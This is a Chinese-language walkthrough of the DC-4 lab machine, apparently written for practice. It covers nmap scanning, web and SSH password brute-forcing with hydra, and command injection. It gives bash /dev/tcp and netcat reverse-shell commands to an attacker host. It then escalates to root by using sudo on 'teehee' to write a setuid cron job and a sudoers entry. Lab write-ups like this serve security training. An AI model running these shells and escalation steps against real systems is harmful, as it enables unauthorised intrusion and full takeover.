畅游DC-4靶机

信息搜集

nmap -sP 192.168.146.0/24 #扫网段看看存活的主机，找到靶机
nmap -sS -Pn -A 192.168.146.141

能够看到开放了22和80端口，那么就能够猜想下，可能要爆破ssh密码或者获得帐号密码直接ssh连上去。
这里先访问web页面，只有一个登录页面，那就先扫描下目录。

看到访问command.php后又跳转回index.php，那么估计是要登录才可使用了。

getFlag

Web登录密码爆破

这里没什么线索，可是登录不用填验证码，就直接尝试爆破吧。

爆破出用户名*，密码happy。


也就是说这里只用密码happy就能登录

命令执行之反弹shell

登录进页面看到命令执行选项，这种状况估计就是参数传递命令，抓个包看看就好了。

能够看到确实是在radio参数传输命令，可是这样比较麻烦，尝试反弹shell。

bash -i >& /dev/tcp/192.168.146.131/4444 0>&1
这里要将&符号url编码下，以便区分参数间的&符号，固然能够直接所有url编码下。bash反弹失败

nc 192.168.31.131 4444 -t /bin/bash #nc反弹成功

根据以前的靶机，能够直接进入/home目录下看看有哪些用户

经检测，charles和sam目录没法ls出文件，而jim能够。

大概就是mbox咱们没有读的权限，backups里面又一堆旧密码，test.sh内容以下

SSH密码爆破

信息搜集的时候咱们就知道22端口是开着的，能够ssh上去。
因此这里的old-passwords多是jim进行ssh的旧密码(如今的密码也可能在其中)，那么就down下来用hydra爆破下。

hydra -l jim -P pwd.txt ssh://192.168.146.141

爆破出用户名是jim，密码是jibril04。直接连上去

提权

ssh jim@192.168.146.141
登录进去看mbox，是一封邮件

既然有邮件，就想到去/var/mail目录下看看，看到邮件的具体内容。有Charles发来的密码。

密码是^xHhA&hvim0y，准备登录charles了。在这以前，先看看jim有没有sudo权限，好的是没有的。
sudo -l

有密码了，直接ssh连上去，ls -al查看charles目录下的内容

看这三个文件没有发现什么有用的信息。那就也来看看有没有sudo权限。

能够发现，能够不用密码使用root权限操做/usr/bin/teehee，这个可执行文件，查看下帮助。

它能够将标准输入复制到每一个文件，那么好办了，既然能够用root权限写文件？那岂不是直接快乐就完事了？
测试下：（成功写入文件）

想一想几个重要的文件，无非就是定时任务文件(crontab)，sudoers文件
先来玩玩定任务文件把。
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

再来写/etc/sudoers文件，先看看本地sudoers文件的语法。

仿造写一个 charles ALL=(ALL:ALL) ALL

能够看到如今charles能够以root用户身份运行全部命令

总结

总的来讲这个靶机也并不难，学到的东西好像也并非不少。。。 主要就学到了利用suid提权，这个利用这个root权限能够写文件。以后就是有写文件权限提权的思路了。